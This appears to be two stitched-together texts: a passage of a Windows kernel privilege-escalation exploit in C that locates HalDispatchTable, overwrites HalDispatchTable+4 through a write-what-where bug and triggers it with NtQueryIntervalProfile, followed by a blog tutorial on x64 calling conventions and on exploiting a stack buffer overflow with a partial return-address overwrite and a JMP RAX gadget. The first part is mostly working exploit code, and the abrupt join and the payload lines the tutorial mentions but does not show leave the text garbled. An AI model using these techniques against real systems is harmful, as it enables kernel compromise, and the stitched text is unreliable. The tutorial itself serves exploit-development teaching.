    SYSTEM_MODULE krnlInfo = *getNtoskrnlInfo();

    // Get kernel base address in kernelspace
    ULONG addr_ntoskrnl = (ULONG)krnlInfo.ImageBaseAddress;
    printf("[+] Found address to ntoskrnl.exe at 0x%x.\n", addr_ntoskrnl);

    // Load kernel in use in userspace to get the offset to HalDispatchTable
    // NOTE: DO NOT HARDCODE KERNEL MODULE NAME
    printf("[+] Kernel in use: %s.\n", krnlInfo.Name);
    char* krnl_name = strrchr((char*)krnlInfo.Name, '\\') + 1;
    HMODULE user_ntoskrnl = LoadLibraryEx(krnl_name, NULL, DONT_RESOLVE_DLL_REFERENCES);
    if (user_ntoskrnl == NULL) {
        printf("[-] Failed to load kernel image.\n");
        exit(-1);
    }
    printf("[+] Loaded kernel in usermode using LoadLibraryEx: 0x%x.\n", user_ntoskrnl);

    ULONG user_HalDispatchTable = (ULONG)GetProcAddress(user_ntoskrnl, "HalDispatchTable");
    if (user_HalDispatchTable == NULL) {
        printf("[-] Failed to locate HalDispatchTable.\n");
        exit(-1);
    }
    printf("[+] Found HalDispatchTable in usermode: 0x%x.\n", user_HalDispatchTable);

    // Calculate address of HalDispatchTable in kernelspace
    ULONG addr_HalDispatchTable = addr_ntoskrnl - (ULONG)user_ntoskrnl + user_HalDispatchTable;
    printf("[+] Found address to HalDispatchTable at 0x%x.\n", addr_HalDispatchTable);
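Stripped of the Windows calls, the last step is a simple rebase. A minimal sketch, with a function name of my own choosing:

```c
#include <stdint.h>

/* Rebases a symbol found in the user-mode copy of the kernel image
 * onto the address where the kernel is actually loaded. */
uint64_t kernel_symbol_address(uint64_t kernel_base,
                               uint64_t user_image_base,
                               uint64_t user_symbol_address)
{
    uint64_t offset = user_symbol_address - user_image_base;
    return kernel_base + offset;
}
```

For example, with made-up values: a kernel base of 0x82800000, a user-mode image loaded at 0x00400000 and the symbol found at 0x0052A3B8 give 0x8292A3B8 as the symbol's kernel address.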
3. Overwriting HalDispatchTable+4
To do this, we just need to submit a buffer that gets cast to WRITE_WHAT_WHERE. Basically two pointers, one for What and another for Where.
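One detail that is easy to get wrong: What is a pointer to the value, not the value itself. Here is a user-mode model of the request and of the vulnerable statement. The type and function names are mine, and the real struct uses PULONG_PTR fields.

```c
#include <stdint.h>

/* Model of WRITE_WHAT_WHERE: two pointers. */
typedef struct write_what_where {
    uintptr_t *what;   /* points at the value to be written */
    uintptr_t *where;  /* destination of the write          */
} write_what_where;

/* Models the driver's vulnerable statement: *(Where) = *(What). */
void trigger_arbitrary_overwrite(const write_what_where *request)
{
    *request->where = *request->what;
}
```

In the exploit, what would point at a variable holding the payload's address and where would be HalDispatchTable+4.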
As explained earlier, we need to call NtQueryIntervalProfile, whose address can be resolved from ntdll.dll.
    // Trigger the payload by calling NtQueryIntervalProfile()
    HMODULE ntdll = GetModuleHandle("ntdll");
    PtrNtQueryIntervalProfile _NtQueryIntervalProfile = (PtrNtQueryIntervalProfile)GetProcAddress(ntdll, "NtQueryIntervalProfile");
    if (_NtQueryIntervalProfile == NULL) {
        printf("[-] Failed to get address of NtQueryIntervalProfile.\n");
        exit(-1);
    }

    ULONG whatever;
    _NtQueryIntervalProfile(2, &whatever);
The previous two blog posts describe how a Stack Based Buffer Overflow vulnerability works on x86 (32 bits) Windows. In the first part, you can find a short introduction to x86 Assembly and how the stack works, and in the second part you can understand this vulnerability and find out how to exploit it.
This article presents a similar approach in order to understand how it is possible to exploit this vulnerability on x64 (64 bits) Windows. The first part covers the differences in the Assembly code between x86 and x64 and the different function calling convention, and the second part details how these vulnerabilities can be exploited.
ASM for x64
There are multiple differences in Assembly that need to be understood in order to proceed. Here we will talk about the most important changes between x86 and x64 related to what we are going to do.
First of all, the registers are now the following:
The general purpose registers are the following: RAX, RBX, RCX, RDX, RSI, RDI, RBP and RSP. They are now 64 bit (8 bytes) instead of 32 bits (4 bytes).
EAX, EBX, ECX, EDX, ESI, EDI, EBP and ESP represent the lower 4 bytes of the previously mentioned registers. They hold 32 bits of data.
There are a few new registers: R8, R9, R10, R11, R12, R13, R14, R15, also holding 64 bits.
It is possible to use R8D, R9D etc. in order to access the lower 4 bytes, as you can do with EAX, EBX etc.
Pushing and popping data on the stack will use 64 bits instead of 32 bits.
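The relation between a 64-bit register and its 32-bit alias can be modelled with plain integers. This is only an illustrative sketch with function names of my own; it also models the x64 rule that writing to a 32-bit alias clears the upper half of the full register.

```c
#include <stdint.h>

/* Value seen through the 32-bit alias (EAX, R8D, ...) of a 64-bit register. */
uint32_t low32(uint64_t reg)
{
    return (uint32_t)(reg & 0xFFFFFFFFu);
}

/* Models a 32-bit write such as "mov eax, 4": the old contents are
 * discarded and the upper 32 bits of the full register become zero. */
uint64_t write_low32(uint64_t old_reg, uint32_t value)
{
    (void)old_reg;
    return (uint64_t)value;
}
```

That zero-extension is why a compiler can load a small constant with a 32-bit mov and still end up with the right value in the full 64-bit register.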
Calling convention
Another important difference is the way functions are called, the calling convention.
Here are the most important things we need to know:
First 4 parameters are not placed on the stack. First 4 parameters are specified in the RCX, RDX, R8 and R9 registers.
If there are more than 4 parameters, the other parameters are placed on the stack, from left to right.
Similar to x86, the return value will be available in the RAX register.
The function caller will allocate stack space for the arguments passed in registers (called “shadow space” or “home space”). Even though the parameters are placed in registers when a function is called, the called function may need to reuse those registers, so it needs somewhere to store the original values, and that place is the stack. The caller has to allocate this space before the function call and deallocate it afterwards. The caller should allocate at least 32 bytes (for the 4 registers), even if not all of them are used.
The stack has to be 16-byte aligned before any call instruction. Some functions might allocate 40 (0x28) bytes on the stack (32 bytes for the 4 registers and 8 bytes to align the stack from previous usage – the return RIP address pushed on the stack) for this purpose. You can find more details here.
Some registers are volatile and others are nonvolatile. This means that if we set some values in registers and call a function (e.g. a Windows API), the volatile registers will probably change while the nonvolatile registers will preserve their values.
More details about calling convention on Windows can be found here.
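The 0x28 figure falls out of the two rules above. Here is a small sketch of the arithmetic, assuming a function that calls other functions and pushes no nonvolatile registers in its prologue (the function name is mine, and real compilers may allocate more than this minimum).

```c
#include <stdint.h>

#define SHADOW_SPACE_BYTES   32u  /* home space for RCX, RDX, R8, R9   */
#define RETURN_ADDRESS_BYTES 8u   /* pushed by the call that got us here */

/* Smallest N for "sub rsp, N" that provides shadow space plus local_bytes
 * of locals and leaves RSP 16-byte aligned at this function's own calls. */
uint32_t min_frame_size(uint32_t local_bytes)
{
    uint32_t n = SHADOW_SPACE_BYTES + local_bytes;

    /* On entry RSP is 8 bytes off a 16-byte boundary, so N plus the
     * return address must be a multiple of 16. */
    while ((n + RETURN_ADDRESS_BYTES) % 16u != 0)
        n++;
    return n;
}
```

With no locals this gives 40 (0x28): 32 bytes of shadow space plus 8 bytes that compensate for the pushed return address.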
Function calling example
Let’s take a simple example in order to understand those things. Below is a function that does a simple addition, and it is called from main.
#include "stdafx.h"
int Add(long x, int y)
{
int z = x + y;
return z;
}
int main()
{
Add(3, 4);
return 0;
}
Here is a possible output, after removing all optimisations and security features.
Main function:
sub rsp,28
mov edx,4
mov ecx,3
call <consolex64.Add>
xor eax,eax
add rsp,28
ret
We can see the following:
sub rsp,28 – This will allocate 0x28 (40) bytes on the stack, as we previously discussed: 32 bytes for the register arguments and 8 bytes for alignment.
mov edx,4 – This will place in EDX register the second parameter. Since the number is small, there is no need to use RDX, the result is the same.
mov ecx,3 – The value of the first argument is placed in the ECX register.
call <consolex64.Add> – Call the “Add” function.
xor eax,eax – Set EAX (or RAX) to 0, as it will be the return value of main.
mov dword ptr ss:[rsp+10],edx – As we know, the arguments are passed in the ECX and EDX registers. But what if the function needs to use those registers for something else? (Note that some registers must be preserved across a function call: RBX, RBP, RDI, RSI, R12, R13, R14 and R15.) In this case, the function will use the “shadow space” (“home space”) allocated by the function caller. With this instruction, the function saves the second argument (the value 4) from the EDX register in the shadow space.
mov dword ptr ss:[rsp+8],ecx – Similar to the previous instruction, this one will save on the stack the first argument (value 3) from the ECX register
sub rsp,18 – Allocate 0x18 (or 24) bytes on the stack. This function does not call other functions, so it does not need to allocate at least 32 bytes. For the same reason, it is not required to align the stack to 16 bytes. I am not sure why it allocates 24 bytes; it looks like the “local variables area” on the stack has to be aligned to 16 bytes and the other 8 bytes might be used for the stack alignment (as previously mentioned).
mov eax,dword ptr ss:[rsp+28] – Will place in EAX register the value of the second parameter (value 4).
mov ecx,dword ptr ss:[rsp+20] – Will place in ECX register the value of the first parameter (value 3).
add ecx,eax – Will add to ECX the value of the EAX register, so ECX will become 7.
mov eax,ecx – Will save the same value (the sum) into EAX register.
mov dword ptr ss:[rsp],eax and mov eax,dword ptr ss:[rsp] look like they are some effects of the removed optimizations, they don’t do anything useful.
add rsp,18 – Cleanup the allocated stack space.
ret – Return from the function.
Exploitation
Let’s see now how it would be possible to exploit a Stack Based Buffer Overflow on x64. The idea is similar to x86: we overwrite the stack until we overwrite the return address. At that point we can control program execution. This is the easiest example to understand this vulnerability.
We have a 40-byte buffer and a function that copies a string into that buffer.
This will be the assembly code of the main function:
sub rsp,28 ; Allocate space on the stack
lea rcx,qword ptr ds:[1400021F0] ; Put in RCX the string ("test")
call <consolex64.Copy> ; Call the Copy function
xor eax,eax ; EAX = 0, return value
add rsp,28 ; Cleanup the stack space
ret ; return
And this will be the assembly code for the Copy function:
mov qword ptr ss:[rsp+8],rcx ; Save the RCX on the stack
sub rsp,58 ; Allocate space on the stack
mov rdx,qword ptr ss:[rsp+60] ; Put in RDX the "Test" string (second parameter to strcpy)
lea rcx,qword ptr ss:[rsp+20] ; Put in RCX the buffer (first parameter to strcpy)
call <consolex64.strcpy> ; Call strcpy function
add rsp,58 ; Cleanup the stack
ret ; Return from function
Let’s modify the Copy function call to the following:
Copy("1111111122222222333333334444444455555555");
The string has 40 bytes, and it will fit in our buffer (however, please note that strcpy will also place a NULL byte after our string, but this way it is easier to see the buffer on the stack).
This is what the stack will look like after the strcpy function call:
000000000012FE90 000007FEEE7E5D98 ; Unused stack space
000000000012FE98 00000001400021C8 ; Unused stack space
000000000012FEA0 0000000000000000 ; Unused stack space
000000000012FEA8 00000001400021C8 ; Unused stack space
000000000012FEB0 3131313131313131 ; "11111111"
000000000012FEB8 3232323232323232 ; "22222222"
000000000012FEC0 3333333333333333 ; "33333333"
000000000012FEC8 3434343434343434 ; "44444444"
000000000012FED0 3535353535353535 ; "55555555"
000000000012FED8 0000000000000000 ; Unused stack space
000000000012FEE0 00000001400021A0 ; Unused stack space
000000000012FEE8 0000000140001030 ; Return address
As you can probably see, we need to add an extra 24 bytes to overwrite the return address: 16 bytes for the unused stack space and 8 bytes for the return address. Let’s modify the Copy function call to the following:
This will overwrite the return address with “AAAAAAAA”.
NULL byte problem
In our case, a call to the “strcpy” function will generate the vulnerability. What is important to understand is that “strcpy” stops copying data when it encounters the first NULL byte. For us, this means that we cannot have NULL bytes in our payload.
This is a problem for a simple reason: the addresses that we might use contain NULL bytes. For example, these are the addresses in my case:
If we would like to proceed like in the 32 bits example, we would have to overwrite the return address to an address such as 000000014000101C where there would be a “JMP RSP” instruction, and continue with our shellcode after this address. As you can see, this is not possible, because the address contains NULL bytes.
So, what can we do? We should find a workaround. A simple and useful trick is the following: we can partially overwrite the return address. Instead of overwriting all 8 bytes of the address, we can overwrite only its lowest 4, 5 or 6 bytes (the ones stored first in memory, since x64 is little-endian). Let’s modify the function call to overwrite only the lowest 5 bytes, so we will just remove 3 “A”s from our payload. The function call will be the following:
Before the “RET” instruction, the stack will look like this:
000000000012FED8 3636363636363636 ; Part of our payload
000000000012FEE0 3737373737373737 ; Part of our payload
000000000012FEE8 0000004141414141 ; Return address
As you can see, we are able to specify a valid address, so we solved our first issue. However, we cannot add anything after it, because the remaining bytes of the address must stay NULL. So how can we exploit this vulnerability?
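The value in the return address slot above can be reproduced with a short simulation. This is only a sketch: partial_overwrite is a hypothetical helper, and it assumes the copy ends exactly inside the return address slot, so that strcpy's terminating NULL byte is written there as well.

```python
import struct

def partial_overwrite(original: int, tail: bytes) -> int:
    """Simulate strcpy writing `tail` plus its terminating NULL byte
    over a saved 8-byte little-endian return address."""
    if b"\x00" in tail or len(tail) >= 8:
        raise ValueError("tail must be 1 to 7 non-NULL bytes")
    slot = bytearray(struct.pack("<Q", original))
    written = tail + b"\x00"          # strcpy also copies the terminator
    slot[:len(written)] = written     # low-order bytes come first in memory
    return struct.unpack("<Q", bytes(slot))[0]

original = 0x0000000140001030         # return address from the first stack dump
result = partial_overwrite(original, b"A" * 5)
print(f"{result:016X}")
```

Note that the terminator overwrites one more byte than the payload itself: with 5 bytes of “A”, the sixth byte of the slot is set to zero, and the two highest bytes keep their original (zero) value.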
Let’s take a look at the registers; maybe we can find an easy win. Here are the registers before the RET instruction:
We can see that the RAX register holds the address where our payload is stored. This happens for a simple reason: the strcpy function copies the string to the buffer and returns the address of the buffer. As we already know, the return value of a function call is stored in the RAX register, so we can reach our payload through RAX.
Now, our exploitation is simple:
We have our payload address in the RAX register
We find a “JMP RAX” instruction
We specify the address of that instruction as the return address
We can easily find some “JMP RAX” instructions:
We will take one of them, one that does not contain NULL bytes in the middle, and we can create the payload:
56 bytes of shellcode (required to reach the return address). We will use 0xCC (the INT 3 instruction, which is used to pause the execution of the program in the debugger)
4 bytes of return address, the “JMP RAX” instruction that we previously found
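The two parts listed above could be assembled along these lines. This is a sketch, not the article's code: build_payload is a hypothetical helper, and JMP_RAX_PLACEHOLDER is a made-up value that must be replaced with an address of a “JMP RAX” instruction found on your own system.

```python
import struct

OFFSET_TO_RET = 56  # bytes from the start of the buffer to the return address

def build_payload(jmp_rax: int) -> bytes:
    """Return 56 bytes of INT 3 followed by the 4 low-order address bytes."""
    if not 0 < jmp_rax <= 0xFFFFFFFF:
        raise ValueError("address must fit in the 4 bytes we overwrite")
    ret = struct.pack("<I", jmp_rax)  # little-endian, lowest byte first
    if b"\x00" in ret:
        raise ValueError("address bytes must not contain NULL")
    return b"\xCC" * OFFSET_TO_RET + ret

# Hypothetical placeholder, NOT a real "JMP RAX" address.
JMP_RAX_PLACEHOLDER = 0x7A1B2C3D

payload = build_payload(JMP_RAX_PLACEHOLDER)
print(len(payload))
print(payload[OFFSET_TO_RET:].hex())
```

The NULL check mirrors the strcpy limitation: if any of the four address bytes were zero, the copy would stop before the return address was fully written.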
Please note, however, that we have a small buffer, so it might be difficult to find shellcode that fits in this space. Still, the purpose of this article was to show a way to exploit this vulnerability that can be easily understood.
Conclusion
Maybe this article did not cover a real-life situation, but it should be enough as a starting point for exploiting stack-based buffer overflows on 64-bit Windows.
My recommendation is to compile a program like this one yourself and try to exploit it. You can download my simple Visual Studio 2017 project from here.
If you have any questions, please leave a comment here or use the contact email.